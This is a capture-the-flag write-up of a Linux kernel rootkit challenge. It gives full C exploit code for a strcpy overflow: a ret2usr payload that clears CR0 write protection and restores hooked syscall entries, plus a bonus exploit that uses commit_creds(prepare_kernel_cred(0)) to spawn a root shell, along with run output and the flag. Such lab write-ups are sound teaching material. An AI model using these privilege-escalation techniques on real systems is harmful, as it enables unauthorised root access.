TL;DR
Same rootkit, harder exploitation. No SMEP/SMAP means we can execute userspace code from kernel context (ret2usr). Overflow the buffer → execute our shellcode → disable CR0 write protection → restore syscall table → iretq back to userspace. As a bonus, the same primitive also gets us a root shell.
Tags: pwn kernel rootkit ret2usr privilege-escalation CR0 iretq SMEP-bypass
Challenge Files: Kernel module (rootkit), same as before
Note: This writeup assumes you’ve read the previous “Hello Rootkitty” challenge. I’ll focus on the advanced techniques specific to the “Harder” version without repeating the basics.
What’s Different?
The vulnerability is the same (buffer overflow in strcpy), but now we have:
New constraints:
- KASLR is enabled (addresses randomized)
- Write Protection (WP bit in CR0) is active
- Need to return cleanly to userspace
But also new opportunities:
- SMEP/SMAP are disabled - we can execute userspace code from kernel!
- We have /proc/kallsyms access for KASLR bypass
This opens up ret2usr attacks - one of the classic kernel exploitation techniques.
Understanding the Syscall Table
Before diving into exploitation, let’s understand what we’re attacking.
How Syscalls Work
A syscall is how userspace programs ask the kernel to do privileged operations:
┌─────────────────────────────────────────┐
│ USERSPACE (Ring 3) │
│ │
│ Program: read(fd, buffer, size) │
│ │ │
│ ▼ │
│ syscall(0, ...) │
└──────────────│──────────────────────────┘
│
│ Transition Ring 3 → Ring 0
▼
┌─────────────────────────────────────────┐
│ KERNEL SPACE (Ring 0) │
│ │
│ Syscall Table: │
│ ┌────────────────────────┐ │
│ │ [0] → sys_read │ │
│ │ [1] → sys_write │ │
│ │ [2] → sys_open │ │
│ │ [3] → sys_close │ │
│ │ ... │ │
│ │ [6] → sys_lstat │ (0x06) │
│ │ [78] → sys_getdents │ (0x4e) │
│ │ ... │ │
│ │ [217]→ sys_getdents64 │ (0xd9) │
│ └────────────────────────┘ │
└─────────────────────────────────────────┘
The syscall table is just an array of function pointers:
// Simplified Linux kernel code
void *sys_call_table[] = {
[0] = sys_read,
[1] = sys_write,
[6] = sys_lstat, // 0x06
[78] = sys_getdents, // 0x4e (0x270 bytes offset)
[217] = sys_getdents64, // 0xd9 (0x6c8 bytes offset)
};
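The byte offsets in the comments above follow directly from the entry size: on x86-64 every slot is an 8-byte pointer, so the offset is the syscall number times 8. A minimal sketch of that arithmetic (the helper name `syscall_slot_offset` is made up for illustration, not part of the kernel or the exploit):

```c
#include <stddef.h>
#include <stdint.h>

/* Byte offset of syscall number `nr` inside a table of 64-bit pointers.
 * Hypothetical helper, only meant to reproduce the offsets quoted above. */
size_t syscall_slot_offset(unsigned int nr)
{
    return (size_t)nr * sizeof(uint64_t);
}
```

For the three hooked syscalls this gives 0x30 (lstat), 0x270 (getdents) and 0x6c8 (getdents64).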
Rootkit Syscall Hooking
The rootkit modifies these pointers to intercept calls:
// Normal state
sys_call_table[217] = sys_getdents64;
// After infection
sys_call_table[217] = malicious_getdents64;
// Now when you do ls:
ls → getdents64() → malicious_getdents64()
→ filters results
→ hides files
→ calls real sys_getdents64
Write Protection (CR0 Register)
The syscall table lives in read-only memory. While the WP (Write Protect) bit in CR0 is set, even ring 0 code faults when it writes to a read-only page, so the bit has to be cleared first:
// Disable WP (bit 16 of CR0)
mov rax, cr0
and rax, ~0x10000 // Clear bit 16
mov cr0, rax
// Now we can modify the table
sys_call_table[217] = evil_function;
// Re-enable WP
mov rax, cr0
or rax, 0x10000 // Set bit 16
mov cr0, rax
This is exactly what rootkits do - and what we’ll need to do to restore the table.
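The bit manipulation itself can be checked in plain userspace C without touching the real register. This is only a sketch of the masking; the helper names are hypothetical and the sample value 0x80050033 is just a CR0 value commonly seen on x86-64 Linux, used here as an illustration:

```c
#include <stdint.h>

#define CR0_WP (UINT64_C(1) << 16)   /* Write Protect is bit 16 of CR0 */

/* Value to load into CR0 so that ring 0 may write to read-only pages. */
uint64_t cr0_without_wp(uint64_t cr0)
{
    return cr0 & ~CR0_WP;
}

/* Value to load into CR0 to turn write protection back on. */
uint64_t cr0_with_wp(uint64_t cr0)
{
    return cr0 | CR0_WP;
}
```

With the sample value, clearing WP yields 0x80040033 and setting it again restores 0x80050033; every other bit is left untouched, which is why the shellcode reads CR0 first instead of writing a constant.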
The Challenge
Same three hooked syscalls as before:
| Syscall | Number | Hex | Table Offset | Purpose |
|---|---|---|---|---|
| lstat | 6 | 0x06 | 0x30 | File metadata |
| getdents | 78 | 0x4e | 0x270 | List directory (32-bit) |
| getdents64 | 217 | 0xd9 | 0x6c8 | List directory (64-bit) |
The vulnerability is still the strcpy buffer overflow - offset is still 102 bytes to RIP.
Active Protections
| Protection | Status | Bypass Method |
|---|---|---|
| KASLR | Enabled | Read /proc/kallsyms |
| WP (CR0) | Enabled | Disable in shellcode |
| SMEP | Disabled | Ret2usr possible! |
| SMAP | Disabled | User memory accessible from kernel |
The lack of SMEP/SMAP is the game changer here.
What is SMEP/SMAP?
SMEP (Supervisor Mode Execution Prevention):
- Prevents kernel from executing code in userspace memory
- Without it: we can put our shellcode in userspace and jump to it from kernel
SMAP (Supervisor Mode Access Prevention):
- Prevents the kernel from reading or writing userspace memory outside explicit stac/clac windows
- Without it: kernel can read/write our userspace variables
Impact: With both disabled, we can execute userspace code with kernel privileges (ret2usr).
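One quick way to confirm this from inside the VM is to look for the smep and smap words on the flags line of /proc/cpuinfo. The sketch below assumes that line has already been read into a string; `has_cpu_flag` is a hypothetical helper, and treating a missing flag as "protection off" is an assumption about how the challenge kernel was booted:

```c
#include <stdbool.h>
#include <string.h>

/* Return true if `flag` appears as a whole whitespace-separated word in
 * `flags` (for example the "flags" line of /proc/cpuinfo). */
bool has_cpu_flag(const char *flags, const char *flag)
{
    size_t len = strlen(flag);
    const char *p = flags;

    if (len == 0)
        return false;
    while ((p = strstr(p, flag)) != NULL) {
        bool starts_word = (p == flags) || p[-1] == ' ' || p[-1] == '\t';
        bool ends_word = p[len] == '\0' || p[len] == ' ' || p[len] == '\n';
        if (starts_word && ends_word)
            return true;
        p += len;   /* partial match (e.g. inside another word), keep looking */
    }
    return false;
}
```

The whole-word check matters so that an unrelated token containing the same letters does not count as a match.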
Exploitation Strategy
Our approach will be different from the basic version:
- Bypass KASLR - Parse /proc/kallsyms for kernel base address
- Write userspace shellcode - Function that restores the syscall table
- Overflow buffer - Same technique, offset 102
- Return to userspace - Use shellcode to fix table, then return cleanly
- iretq back - Proper transition from kernel to userspace
Why This is Harder
Unlike the first version where we just called cleanup_module(), now we need to:
- Manually manipulate CR0 to disable write protection
- Write directly to the syscall table
- Use iretq instruction to return to userspace properly
- Save and restore CPU context (CS, SS, RSP, RFLAGS)
Step 1: KASLR Bypass
Kernel addresses are randomized on each boot, so we need to read them at runtime:
unsigned long resolve_kernel_symbol(const char *symbol_name) {
FILE *kallsyms = fopen("/proc/kallsyms", "r");
if (!kallsyms) return 0;
char buffer[512], current_symbol[256];
unsigned long symbol_addr = 0;
// Format: <address> <type> <symbol>
// Example: ffffffffa2800000 T _text
while (fgets(buffer, sizeof(buffer), kallsyms)) {
if (sscanf(buffer, "%lx %*c %s", &symbol_addr, current_symbol) == 2) {
if (strcmp(current_symbol, symbol_name) == 0) {
fclose(kallsyms);
return symbol_addr;
}
}
}
fclose(kallsyms);
return 0;
}
// Usage
unsigned long kbase = resolve_kernel_symbol("_text");
unsigned long syscall_table = kbase + 0x8001a0;
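KASLR shifts the whole kernel image by one slide, so the distance between `_text` and any other symbol stays constant across boots. That is why a hard-coded offset such as 0x8001a0 keeps working. A small sketch of how such an offset could be derived from two kallsyms lines; both helper names are hypothetical, and it assumes the target symbol is actually listed in /proc/kallsyms:

```c
#include <stdio.h>
#include <string.h>

/* Parse one "<address> <type> <symbol>" line. Returns the address if the
 * line describes `wanted`, otherwise 0. A result of 0 is also what you get
 * when the kernel hides addresses from unprivileged readers. */
unsigned long kallsyms_line_addr(const char *line, const char *wanted)
{
    unsigned long addr = 0;
    char name[256];

    if (sscanf(line, "%lx %*c %255s", &addr, name) != 2)
        return 0;
    return strcmp(name, wanted) == 0 ? addr : 0;
}

/* Offset of a symbol from the kernel base; unaffected by the KASLR slide. */
unsigned long symbol_offset(unsigned long kbase, unsigned long sym_addr)
{
    return sym_addr - kbase;
}
```

Checking the result for 0 before using it is worthwhile: with restricted kernel pointers every address in the file reads as zeros, and the exploit would otherwise jump to nonsense.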
Step 2: Save Userspace Context
Before triggering the exploit, we need to save our userspace CPU state for later return:
unsigned long saved_cs, saved_ss, saved_rflags, saved_rsp;
void capture_userspace_context() {
asm volatile(
"mov %%cs, %0;" // Code Segment
"mov %%ss, %1;" // Stack Segment
"mov %%rsp, %2;" // Stack Pointer
"pushfq;" // Push RFLAGS
"pop %3;" // Pop into variable
: "=r"(saved_cs), "=r"(saved_ss),
"=r"(saved_rsp), "=r"(saved_rflags)
);
}
Why? The iretq instruction needs these values to properly return from kernel to userspace.
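A cheap sanity check on the saved values is to look at the low two bits of each selector, which hold the requested privilege level. The sketch below uses hypothetical helper names; the sample selectors 0x33 and 0x2b are the usual 64-bit Linux user code and data selectors and are stated here as an assumption about the target:

```c
#include <stdint.h>

/* Requested privilege level: the low two bits of a segment selector. */
unsigned int selector_rpl(uint64_t selector)
{
    return (unsigned int)(selector & 3);
}

/* True when both saved selectors describe ring 3, which is what the
 * iretq frame must contain to land back in userspace. */
int context_is_userspace(uint64_t cs, uint64_t ss)
{
    return selector_rpl(cs) == 3 && selector_rpl(ss) == 3;
}
```

If this check fails, the context was captured in the wrong place or the variables were clobbered, and iretq would not drop privileges as intended.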
Step 3: The Restore Shellcode
This is where the magic happens. Our shellcode runs in kernel context:
void restore_syscall_table() {
unsigned long *sys_table = (unsigned long *)(kbase + 0x8001a0);
// 1. Disable Write Protection (clear bit 16 of CR0)
asm volatile(
"mov %%cr0, %%rax;"
"and $~0x10000, %%rax;" // Clear WP bit
"mov %%rax, %%cr0;"
::: "rax"
);
// 2. Restore original syscalls
sys_table[217] = kbase + 0xc7610; // sys_getdents64
sys_table[78] = kbase + 0xc7710; // sys_getdents
sys_table[6] = kbase + 0xbad30; // sys_lstat
// 3. Re-enable Write Protection (set bit 16)
asm volatile(
"mov %%cr0, %%rax;"
"or $0x10000, %%rax;" // Set WP bit
"mov %%rax, %%cr0;"
::: "rax"
);
// 4. Return to userspace via iretq
// iretq pops in order: RIP, CS, RFLAGS, RSP, SS
asm volatile(
"swapgs;" // Swap GS (kernel ↔ user)
"mov %0, %%r14; push %%r14;" // SS
"mov %1, %%r14; push %%r14;" // RSP
"mov %2, %%r14; push %%r14;" // RFLAGS
"mov %3, %%r14; push %%r14;" // CS
"mov %4, %%r14; push %%r14;" // RIP
"iretq;"
:
: "m"(saved_ss), "m"(saved_rsp), "m"(saved_rflags),
"m"(saved_cs), "r"(cleanup_and_exit)
: "r14"
);
}
void cleanup_and_exit() {
// Back in userspace now!
exit(EXIT_SUCCESS);
}
Understanding swapgs + iretq
swapgs:
- Swaps the GS register base between kernel and user values
- Necessary for proper context switching
- Without it: GS corruption leads to kernel panic
iretq (Interrupt Return):
- Privileged instruction that returns from an interrupt/exception
- Pops 5 values from stack: RIP, CS, RFLAGS, RSP, SS
- Transitions from Ring 0 (kernel) to Ring 3 (userspace)
- Without it: we’d stay in kernel mode and crash
Why not just ret?
- ret only pops RIP - doesn’t restore full CPU state
- We’d return to userspace with kernel-mode CS/SS
- First syscall or privilege check would trigger a fault
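The push order in the shellcode is the reverse of the pop order because the stack grows downward: SS is pushed first so that RIP ends up at the lowest address, where iretq starts reading. The following userspace simulation of the five pushes is only a sketch; the struct and function names are hypothetical:

```c
#include <stdint.h>

/* Layout iretq expects at the top of the stack, lowest address first. */
struct iret_frame {
    uint64_t rip;
    uint64_t cs;
    uint64_t rflags;
    uint64_t rsp;
    uint64_t ss;
};

/* Simulate the five pushes (SS first, RIP last) on a downward-growing
 * stack and return a pointer to the resulting frame. */
struct iret_frame *push_iret_frame(uint64_t *stack_top, uint64_t rip,
                                   uint64_t cs, uint64_t rflags,
                                   uint64_t rsp, uint64_t ss)
{
    uint64_t *sp = stack_top;

    *--sp = ss;
    *--sp = rsp;
    *--sp = rflags;
    *--sp = cs;
    *--sp = rip;
    return (struct iret_frame *)sp;
}
```

Reading the returned frame front to back gives RIP, CS, RFLAGS, RSP, SS, which is exactly the order iretq pops them.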
Step 4: Build the Payload
int main() {
char filename[256];
char buffer[256];
// 1. Bypass KASLR
kbase = resolve_kernel_symbol("_text");
printf("[+] Kernel base: 0x%lx\n", kbase);
// 2. Save context for iretq
capture_userspace_context();
// 3. Build exploit filename
strcpy(filename, "ecsc_flag_");
memset(filename + 10, 'B', 102); // Padding to RIP
// 4. ROP chain
unsigned long *rop = (unsigned long *)(filename + 112);
rop[0] = kbase + 0x02fd70; // ret (stack alignment)
rop[1] = (unsigned long)restore_syscall_table; // our shellcode
// 5. Create malicious file
int fd = open(filename, O_RDWR | O_CREAT, 0644);
close(fd);
// 6. Trigger vulnerability
fd = open(".", O_RDONLY | O_DIRECTORY);
syscall(SYS_getdents, fd, buffer, 256);
close(fd);
return 0;
}
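Because the payload travels as a filename and is then copied with strcpy, it stops at the first NUL byte and cannot contain '/'. The kernel gadget address has to be free of both, while the userspace shellcode address may end in zero bytes since it is the last entry. A sketch of that check and of the resulting layout, using hypothetical helper names and assuming a little-endian x86-64 build:

```c
#include <stdint.h>
#include <string.h>

#define PREFIX  "ecsc_flag_"
#define PAD_LEN 102

/* True if any byte of `v` would end or split a filename (NUL or '/'). */
int has_bad_filename_byte(uint64_t v)
{
    for (int i = 0; i < 8; i++) {
        unsigned char b = (unsigned char)((v >> (8 * i)) & 0xff);
        if (b == 0x00 || b == '/')
            return 1;
    }
    return 0;
}

/* Fill `out` (at least 256 bytes) with prefix, padding and the two chain
 * entries, and return the filename length the kernel will actually see. */
size_t build_payload(char *out, uint64_t ret_gadget, uint64_t shellcode)
{
    size_t prefix_len = strlen(PREFIX);

    memset(out, 0, 256);
    memcpy(out, PREFIX, prefix_len);
    memset(out + prefix_len, 'B', PAD_LEN);
    /* memcpy avoids casting a char buffer to an unsigned long pointer. */
    memcpy(out + prefix_len + PAD_LEN, &ret_gadget, sizeof(ret_gadget));
    memcpy(out + prefix_len + PAD_LEN + 8, &shellcode, sizeof(shellcode));
    return strlen(out);
}
```

With a gadget at 0xffffffffae82fd70 and shellcode at 0x4019d5 (the values from the run shown later), the visible filename is 123 bytes long: 10 + 102 + 8 + the three non-zero bytes of the shellcode address. Since the base is randomized, running `has_bad_filename_byte` on the gadget address before creating the file catches the occasional unlucky boot.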
Execution Flow
Here’s what happens when we trigger the exploit:
1. Create file: ecsc_flag_BBB...[ret][shellcode_addr]
↓
2. syscall(SYS_getdents) → kernel calls ecsc_sys_getdents()
↓
3. strcpy(buffer, filename) → OVERFLOW overwrites return address
↓
4. Function returns → RIP = restore_syscall_table
↓
5. Shellcode executes (in kernel context):
mov rax, cr0; and rax, ~0x10000; mov cr0, rax ← Disable WP
sys_table[217] = sys_getdents64 ← Restore entries
sys_table[78] = sys_getdents
sys_table[6] = sys_lstat
mov rax, cr0; or rax, 0x10000; mov cr0, rax ← Enable WP
swapgs ← Prep GS for userspace
push SS/RSP/RFLAGS/CS/RIP ← Setup stack for iretq
iretq ← Return to userspace
↓
6. cleanup_and_exit() executes → exit(0)
↓
7. Rootkit disabled! Files are visible
Full Exploit Code
// Compilation: gcc -o pwn pwn.c -static -no-pie -O0
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
// Kernel offsets (find via reverse engineering or trial)
#define SYSCALL_TABLE_OFFSET 0x8001a0
#define GETDENTS64_OFFSET 0xc7610
#define GETDENTS_OFFSET 0xc7710
#define LSTAT_OFFSET 0xbad30
#define RET_GADGET_OFFSET 0x02fd70
#define OVERFLOW_OFFSET 102
static unsigned long kbase = 0;
static unsigned long saved_cs, saved_ss, saved_rflags, saved_rsp;
unsigned long resolve_kernel_symbol(const char *symbol_name) {
FILE *kallsyms = fopen("/proc/kallsyms", "r");
if (!kallsyms) return 0;
char buffer[512], current_symbol[256];
unsigned long symbol_addr = 0;
while (fgets(buffer, sizeof(buffer), kallsyms)) {
if (sscanf(buffer, "%lx %*c %s", &symbol_addr, current_symbol) == 2) {
if (strcmp(current_symbol, symbol_name) == 0) {
fclose(kallsyms);
return symbol_addr;
}
}
}
fclose(kallsyms);
return 0;
}
void capture_userspace_context() {
asm volatile(
"mov %%cs, %0;"
"mov %%ss, %1;"
"mov %%rsp, %2;"
"pushfq;"
"pop %3;"
: "=r"(saved_cs), "=r"(saved_ss),
"=r"(saved_rsp), "=r"(saved_rflags)
);
}
void cleanup_and_exit() {
exit(EXIT_SUCCESS);
}
void restore_syscall_table() {
unsigned long *sys_table = (unsigned long *)(kbase + SYSCALL_TABLE_OFFSET);
// Disable Write Protection
asm volatile(
"mov %%cr0, %%rax;"
"and $~0x10000, %%rax;"
"mov %%rax, %%cr0;"
::: "rax"
);
// Restore hooked syscalls
sys_table[217] = kbase + GETDENTS64_OFFSET;
sys_table[78] = kbase + GETDENTS_OFFSET;
sys_table[6] = kbase + LSTAT_OFFSET;
// Re-enable Write Protection
asm volatile(
"mov %%cr0, %%rax;"
"or $0x10000, %%rax;"
"mov %%rax, %%cr0;"
::: "rax"
);
// Return to userspace
asm volatile(
"swapgs;"
"mov %0, %%r14; push %%r14;" // SS
"mov %1, %%r14; push %%r14;" // RSP
"mov %2, %%r14; push %%r14;" // RFLAGS
"mov %3, %%r14; push %%r14;" // CS
"mov %4, %%r14; push %%r14;" // RIP
"iretq;"
:
: "m"(saved_ss), "m"(saved_rsp), "m"(saved_rflags),
"m"(saved_cs), "r"(cleanup_and_exit)
: "r14"
);
}
int main() {
char filename[256];
char buffer[256];
int fd;
// Step 1: Bypass KASLR
kbase = resolve_kernel_symbol("_text");
if (!kbase) {
fprintf(stderr, "[-] Failed to resolve kernel base\n");
return EXIT_FAILURE;
}
printf("[+] Kernel base: 0x%lx\n", kbase);
printf("[+] Syscall table: 0x%lx\n", kbase + SYSCALL_TABLE_OFFSET);
// Step 2: Save userspace context
capture_userspace_context();
// Step 3: Build payload
memset(filename, 0, sizeof(filename));
strcpy(filename, "ecsc_flag_");
int prefix_len = strlen(filename);
memset(filename + prefix_len, 'B', OVERFLOW_OFFSET);
// Step 4: ROP chain
unsigned long *rop = (unsigned long *)(filename + prefix_len + OVERFLOW_OFFSET);
rop[0] = kbase + RET_GADGET_OFFSET;
rop[1] = (unsigned long)restore_syscall_table;
printf("[+] Shellcode @ 0x%lx\n", (unsigned long)restore_syscall_table);
printf("[+] Weaponizing filename...\n");
// Step 5: Create malicious file
fd = open(filename, O_RDWR | O_CREAT, 0644);
if (fd < 0) {
perror("[-] File creation failed");
return EXIT_FAILURE;
}
close(fd);
printf("[+] Triggering vulnerability...\n");
// Step 6: Trigger overflow
fd = open(".", O_RDONLY | O_DIRECTORY);
if (fd < 0) {
perror("[-] Directory open failed");
return EXIT_FAILURE;
}
syscall(SYS_getdents, fd, buffer, sizeof(buffer));
close(fd);
fprintf(stderr, "[-] Exploit failed\n");
return EXIT_FAILURE;
}
Execution
$ cd /mnt/share
$ gcc -o pwn pwn.c -static -no-pie -O0
$ ./pwn
[+] Kernel base: 0xffffffffae800000
[+] Syscall table: 0xffffffffaf0001a0
[+] Shellcode @ 0x4019d5
[+] Weaponizing filename...
[+] Triggering vulnerability...
$ cd /
$ cat ecsc_flag_*
ECSC{2e94068aa85e0a7a21163fcad4566a0f92fa08dcaf874a5e34fba4612cfd7eaa}
Success!
BONUS: Root Shell Exploitation
Why just restore the syscall table when we can get root?
Kernel Privilege Functions
The Linux kernel provides two critical functions for privilege management:
// Allocates a new cred struct; with a NULL (0) argument it copies init's credentials (UID/GID 0)
struct cred *prepare_kernel_cred(struct task_struct *daemon);
// Applies credentials to current process
int commit_creds(struct cred *new);
Magic combo: commit_creds(prepare_kernel_cred(0)) gives us UID/GID 0!
Root Shellcode
void shellcode() {
// commit_creds(prepare_kernel_cred(0))
asm(
".intel_syntax noprefix;"
"xor rdi, rdi;" // rdi = 0 (NULL)
"mov rax, %0;" // rax = prepare_kernel_cred
"call rax;" // prepare_kernel_cred(0)
"mov rdi, rax;" // rdi = result (new creds)
"mov rax, %1;" // rax = commit_creds
"call rax;" // commit_creds(new_creds)
".att_syntax;"
:
: "r"(prepare_kernel_cred), "r"(commit_creds)
: "rax", "rdi", "rdx", "rcx", "rsi", "r8", "r9", "r10", "r11"
);
// Return to userspace
asm(
".intel_syntax noprefix;"
"swapgs;"
"mov r15, user_ss;"
"push r15;"
"mov r15, user_sp;"
"push r15;"
"mov r15, user_rflags;"
"push r15;"
"mov r15, user_cs;"
"push r15;"
"mov r15, %0;"
"push r15;"
"iretq;"
".att_syntax;"
:
: "r"(spawn_shell)
: "r15"
);
}
void spawn_shell() {
printf("[+] UID: %d\n", getuid());
if (getuid() == 0) {
printf("[+] ROOT SHELL!\n");
}
execve("/bin/sh", NULL, NULL);
exit(0);
}
Root Exploit (Full Code)
// gcc -o root root.c -static -no-pie -O0
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#define OFFSET 102
#define GADGET_RET_OFFSET 0x02fd70
unsigned long user_cs, user_ss, user_rflags, user_sp;
unsigned long prepare_kernel_cred;
unsigned long commit_creds;
unsigned long kernel_base;
void save_state() {
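asm(
".intel_syntax noprefix;" // the operands below are in Intel order
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;" // switch back for the rest of the file
);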
}
void spawn_shell() {
printf("[+] UID: %d\n", getuid());
if (getuid() == 0) {
printf("[+] ROOT SHELL OBTAINED!\n");
}
char *argv[] = {"/bin/sh", NULL};
execve("/bin/sh", argv, NULL);
exit(0);
}
void shellcode() {
// commit_creds(prepare_kernel_cred(0))
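asm(
"xor %%rdi, %%rdi;" // rdi = NULL
"mov %0, %%rax;" // AT&T order: source first, destination last
"call *%%rax;" // prepare_kernel_cred(NULL)
"mov %%rax, %%rdi;" // rdi = new creds
"mov %1, %%rax;"
"call *%%rax;" // commit_creds(new creds)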
:
: "r"(prepare_kernel_cred), "r"(commit_creds)
: "rax", "rdi", "rdx", "rcx", "rsi", "r8", "r9", "r10", "r11"
);
// Return to userspace
asm(
"swapgs;"
"mov %0, %%r15; push %%r15;" // SS
"mov %1, %%r15; push %%r15;" // RSP
"mov %2, %%r15; push %%r15;" // RFLAGS
"mov %3, %%r15; push %%r15;" // CS
"mov %4, %%r15; push %%r15;" // RIP
"iretq;"
:
: "m"(user_ss), "m"(user_sp), "m"(user_rflags),
"m"(user_cs), "r"(spawn_shell)
: "r15"
);
}
unsigned long get_symbol(const char *sym) {
FILE *f = fopen("/proc/kallsyms", "r");
if (!f) return 0;
char line[256], name[128];
unsigned long addr = 0;
while (fgets(line, sizeof(line), f)) {
if (sscanf(line, "%lx %*c %s", &addr, name) == 2) {
if (!strcmp(name, sym)) {
fclose(f);
return addr;
}
}
}
fclose(f);
return 0;
}
int main() {
char name[200];
unsigned long *rop;
// Resolve symbols
kernel_base = get_symbol("_text");
prepare_kernel_cred = get_symbol("prepare_kernel_cred");
commit_creds = get_symbol("commit_creds");
if (!kernel_base || !prepare_kernel_cred || !commit_creds) {
printf("[-] Failed to resolve symbols\n");
return 1;
}
printf("[+] kernel_base: 0x%lx\n", kernel_base);
printf("[+] prepare_kernel_cred: 0x%lx\n", prepare_kernel_cred);
printf("[+] commit_creds: 0x%lx\n", commit_creds);
printf("[+] shellcode: 0x%lx\n", (unsigned long)shellcode);
save_state();
// Build payload
memset(name, 0, sizeof(name));
strcpy(name, "ecsc_flag_");
memset(name + 10, 'A', OFFSET);
rop = (unsigned long *)(name + 10 + OFFSET);
rop[0] = kernel_base + GADGET_RET_OFFSET;
rop[1] = (unsigned long)shellcode;
printf("[+] Triggering privilege escalation...\n");
// Trigger
int fd = open(name, O_RDWR | O_CREAT, 0644);
close(fd);
fd = open(".", O_RDONLY);
syscall(SYS_getdents, fd, name, 200);
printf("[-] Still here\n");
return 0;
}
Root Shell Demo
$ id
uid=1000(user) gid=1000(user)
$ ./root
[+] kernel_base: 0xffffffffa2800000
[+] prepare_kernel_cred: 0xffffffffa28ab540
[+] commit_creds: 0xffffffffa28ab1e0
[+] shellcode: 0x401b3f
[+] Triggering privilege escalation...
[+] UID: 0
# id
uid=0(root) gid=0(root)
Why Root Method Works
- prepare_kernel_cred(0) creates a cred structure with UID/GID 0 and a full capability set
- commit_creds(new_cred) applies these credentials to the current process
- iretq to spawn_shell() - process inherits root credentials
- getuid() returns 0 - we’re root!
No need to touch CR0 or syscall table - we’re just calling legitimate kernel functions.
Protection mechanisms:
| Protection | If Enabled | If Disabled |
|---|---|---|
| SMEP | Blocks ret2usr | Userspace code executable from kernel |
| SMAP | Blocks user memory access | Kernel can read/write userspace |
| KASLR | Randomizes addresses | Fixed addresses |
| WP (CR0) | Syscall table read-only | Can be modified |
Key insights:
- ret2usr is powerful but requires SMEP to be disabled
- iretq is necessary for clean kernel-to-user transitions
Flag
ECSC{2e94068aa85e0a7a21163fcad4566a0f92fa08dcaf874a5e34fba4612cfd7eaa}